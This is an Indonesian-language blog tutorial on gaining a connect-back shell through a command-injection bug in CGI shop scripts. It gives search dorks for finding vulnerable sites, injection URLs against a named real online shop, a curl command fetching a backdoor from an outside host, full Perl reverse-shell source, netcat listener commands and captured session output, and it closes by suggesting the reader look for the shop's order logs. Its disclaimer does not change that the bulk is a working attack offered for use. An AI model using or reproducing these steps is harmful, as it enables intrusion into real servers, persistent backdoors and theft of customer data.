Searching...
Jumat, 18 Februari 2011

Connect Back melalui Bug CGI

.:.:.:.:.:.:..:.:.:.:.:.:..:.:.:.:.:.:..:.:.:.:.:.:..:.:.:.:.:.:..:.:.:.:.:.
Saya tidak bertanggung jawab atas akibat atau dampak yang disebabkan oleh penggunaan materi dari tutorial ini. Tujuan penulis hanya ingin menyampaikan materi kepada pihak-pihak yang bertanggung jawab dan "Want to  earn", tidak kepada pihak-pihak yang ingin merugikan orang lain.
.:.:.:.:.:.:..:.:.:.:.:.:..:.:.:.:.:.:..:.:.:.:.:.:..:.:.:.:.:.:..:.:.:.:.:.
 
 
Intro
Seperti yang sudah kita tahu Bug CGI memungkinkan kita untuk melaksanakan command-command untuk meng-eksploitasi sistem. Tetapi hal ini juga dipengaruhi oleh settingan dari sistem tersebut apakah mengijinkan kita untuk membuat/menulis File di Server tersebut.

Tujuan
Membuat suatu backdoor dengan cara connect back melalui CGI Bug

Tools atau Softwarez dan Skill yang diperlukan
Setidaknya mengerti perintah/command *Nix atau Linux (ls, cp, rm, cat, locate ,dll)
Softwarez : Browser HTML (Opera, FireFox, IE, dll)
Tools : NetCat dan file backdoor (.txt atau .prl)

Tutorial
Langkah pertama yang harus dilakukan adalah mencari site yang menggunakan CGI dengan bug :
"shop.pl?seite" atau "family_showpage.cgi". Bagaimana mencarinya? yaitu googling dan memasukkan keyword allinurl dengan tambahan bug diatas. Contoh, allinurl :
"shop.pl?seite". Maka kita akan dapat berbagai macam halaman yang dapat di-tes bugnya. Pilih salah satu dan kita akan memulai mencoba connect back. 
 
Langkah kedua yaitu masukkan perintah/command yang diinginkan diantara char "||", maka perintah kita akan terlihat seperti ini : |perintah|, selain dengan char pipe(|) bisa juga menggunakan char ";".
Contoh (dengan bug shop.pl?seite) :

>> https://www.a66.de/cgilocal/shop.pl?seite=hauptseite.html&KNR=3055892
>> https://www.a66.de/cgi-local/shop.pl?seite=hauptseite.html|perintah|&KNR=3055892
>> https://www.a66.de/cgi-local/shop.pl?seite=hauptseite.html|ls|&KNR=3055892
 
Maka pada browser kita akan terlihat isi dari direktori server tersebut.
Contoh :

finnishorder.pl formmailmalaysia.pl honeymoon.cfg honeymoon.pl honeymoonfinnishorder.pl
honeymoonorder.pl ikonboard order.pl preise.pl remview.php shop.cfg shop.pl
 
Weikkss....Banyak filenya tuh :P
 
Langkah ketiga cek apakah kita diijinkan untuk menulis/membuat file disana dengan perintah "id"
 
>> https://www.a66.de/cgi-local/shop.pl?seite=hauptseite.html|id|&KNR=3055892
 
Kalo benar maka akan tampak :
 
uid=290076(ade001) gid=103(web) groups=103(web)
 
Perhatikan User-idnya, Wah sepertinya kita bisa nih nulis/remove File :D 
 
Selanjutnya kita upload File Backdoor yang kita ambil dari site lain, 
 
https://www.a66.de/cgi-local/shop.pl?seite=hauptseite.html|curl -o back.txt
http://www.goodwillco.com/tes.txt|&KNR=3055892

 
Catatan : Site www.goodwillco.com hanya menyediakan file backdoor yaitu tes.txt, kalo sudah tidak ada  silahkan copy-paste teks berikut kedalam Notepad  dan simpan dengan Ekstensi *.txt, Coding by 1St :D
 
#!/usr/bin/perl
# Remote Connect-Back Backdoor Shell v1.0.
# (c)AresU 2004
# 1ndonesia Security Team (1st)
# AresU[at]bosen.net
# Usage:
# 1) Listen port to received shell prompt using NetCat on your toolbox, for example: nc -
l -p 9000
# 2) Remote Command Execution your BackDoor Shell, for example: perl connect.pl
<iptoolbox> <ncportlisten>
# --------
# The supplied exploit code is not to be used for malicious purpose, but for educational
purpose only. The Authors and 1ndonesian Security Team WILL NOT responsible for anything
happened by the couse of using all information on these website.
# ---------
use Socket;
$pamer="(c)AresU Connect-Back Backdoor Shell v1.0\n1ndonesia Security Team (1st)\n\n"; 
$cmd= "lpd";
$system= 'echo "`uname -a`";echo "`id`";/bin/sh';
$0=$cmd;
$target=$ARGV[0];
$port=$ARGV[1];
$iaddr=inet_aton($target) || die("Error: $!\n");
$paddr=sockaddr_in($port, $iaddr) || die("Error: $!\n");
$proto=getprotobyname('tcp');
socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
connect(SOCKET, $paddr) || die("Error: $!\n");
open(STDIN, ">&SOCKET");
open(STDOUT, ">&SOCKET");
open(STDERR, ">&SOCKET");
print STDOUT $pamer;
system($system);
close(STDIN);
close(STDOUT);
close(STDERR) 
Catatan2 : curl -o akan menyimpan file backdoor di server web sasaran dengan nama back.txt Kalo curl -o tidak bisa gunakan wget -o.

Lakukan lagi perintah ls untuk melihat apakah file backdoor kita sudah terupload...

https://www.a66.de/cgi-local/shop.pl?seite=hauptseite.html|ls|&KNR=3055892
back.txt finnishorder.pl formmailmalaysia.pl honeymoon.cfg honeymoon.pl
honeymoonfinnishorder.pl honeymoonorder.pl ikonboard order.pl preise.pl remview.php
shop.cfg shop.pl

Tampaknya file backdoor kita sudah ada tuh :D

Buka port di kompie kita dengan binding port melalui netcat.exe, Perintahnya

>
C:\>netcat.exe -lLvvp 9000

Catatan: port 9000 dan drive system bisa diganti sesuai dengan kondisi komputer masing2 :D
Kalo sudah maka netcat akan melisten koneksi yang masuk di port 9000 tersebut

Kita akan melakukan connectback dari server korban dengan meng-compile file backdorr tsb :

https://www.a66.de/cgi-local/shop.pl?seite=hauptseite.html|PERL back.txt 61.xxx.xxx.xxx
9000|&KNR=3055892

catatan: ip 61.xxx.xxx.xxx adalah alamat IP komputer kita dan 9000 adalah port tujuan yang sudah terbuka, jika komputer kita memakai proxy atau firewall harap di konfigurasi ulang agar server korban bisa melakukan connectback terhadap kita :D

Bila benar maka :

C:\>netcat -lLvvp 9000
listening on [any] 9000 ...
connect to [61.xxx.xxx.xxx] from www.a66.de [213.198.17.90] 14542
(c)AresU Connect-Back Backdoor Shell v1.0
1ndonesia Security Team (1st)
Linux a66.de 2.4.2 FreeBSD 4.7-RELEASE-p22 #5: Tue May 3 13:36:49 MDT 2005
roo i386 unknown
uid=290076(ade001) gid=103(web) groups=103(web)
ls
back.txt
finnishorder.pl
formmailmalaysia.pl
honeymoon.cfg
honeymoon.pl
honeymoonfinnishorder.pl
honeymoonorder.pl
ikonboard
order.pl
preise.pl
remview.php
shop.cfg
shop.pl
su
su: you are not in the correct group (sys) to su root.


weiikkssss....bisa konek ternyata :D, tapi sayangnya kita gak bisa akses super user tuh :(
Mungkin kita bisa liat groupnya :

https://www.a66.de/cgi-local/shop.pl?seite=hauptseite.html|ls /etc|&KNR=3055892
DIR_COLORS X11 bashrc csh.cshrc csh.login filesystems group host.conf hosts.allow
hosts.deny info-dir inputrc
ld.so.cache ld.so.conf ldap_auth master.passwd mhpop_redirect mtab nsswitch.conf opt
pam.d passwd profile profile.d
redhat-release rpc rpm securetty shells skel ssd.attrib syb_dbs termcap xinetd.d
yp.conf
https://www.a66.de/cgi-local/shop.pl?seite=hauptseite.html|cat /etc/group|&KNR=3055892
sys::0:root,bin,sys,adm,devel,smoc1,daemon,vbackups,sap,sentinel root::0:root
daemon::1:root,daemon bin::2:root,bin,daemon
adm::3:root,adm,daemon mail::4:root uucp::5:uucp rje::8: lp:*:9: nuucp::10:nuucp
user::20: ftp::201:
other::995: guest:*:998: postgres:*:70: news:*:86: mysql:*:88: sql:*:89:
staff::100:devel,smoc1 sybase::101:sybase,devel,webapps,sap,jkoecher,anonweb
client:*:102:devel,root,webapps,urchind web:*:103:root,webapps nofiles:*:104:
qmail:*:105: devel:*:106:sybase,hu,webapps,sap,ftp,jkoecher,anonweb mailed:*:107:barryg
apps:*:108:hu,idsuser networks:*:109: squid:*:203: solutions:*:1025: test:*:204:
dnsadmin:x:501:named tsedit:*:110:lvance,chuckr,eduda,ggarza,steve,mbalme
mailedit:*:111:mminnig
nogroup:*:65533: webapps:*:149: sap:*:191: nobody:*:60001: smmsp:*:25:smmsp


Wekkksss...... :( ternyata kita hanya ada di group web doank :~~...gimana ngerubahnya ??? sayangnya  tutorial ini hanya membahas caraa kita untuk melakukan connectback dengan menggunakan CGI BUG. Untuk lebih jelasnya silakan cari artikel ttg hal tsb di Google :D

Terus kita bisa ngapain ajah nih??? ya macam2 kayak liat file order.log-nya mungkin !!!???? :D (ingat site ini adalah semacam online-shop :D), silakan masukkan perintah locate order.log atau locate .log di browser sobat :D hehehehehehhe

0 comments:

Posting Komentar

Like & Share :


Mari budayakan berkomentar baik berupa Kritik, Saran, maupun Pertanyaan untuk menjadikan blog ini lebih baik ke depannya. Copy-Paste di ijinkan, tapi URL sumbernya disertakan.
Terima Kasih.

 
Back to top!